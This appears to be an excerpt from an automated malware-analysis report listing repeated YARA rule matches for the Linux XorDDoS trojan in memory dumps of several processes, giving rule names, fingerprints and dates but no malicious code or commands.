Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
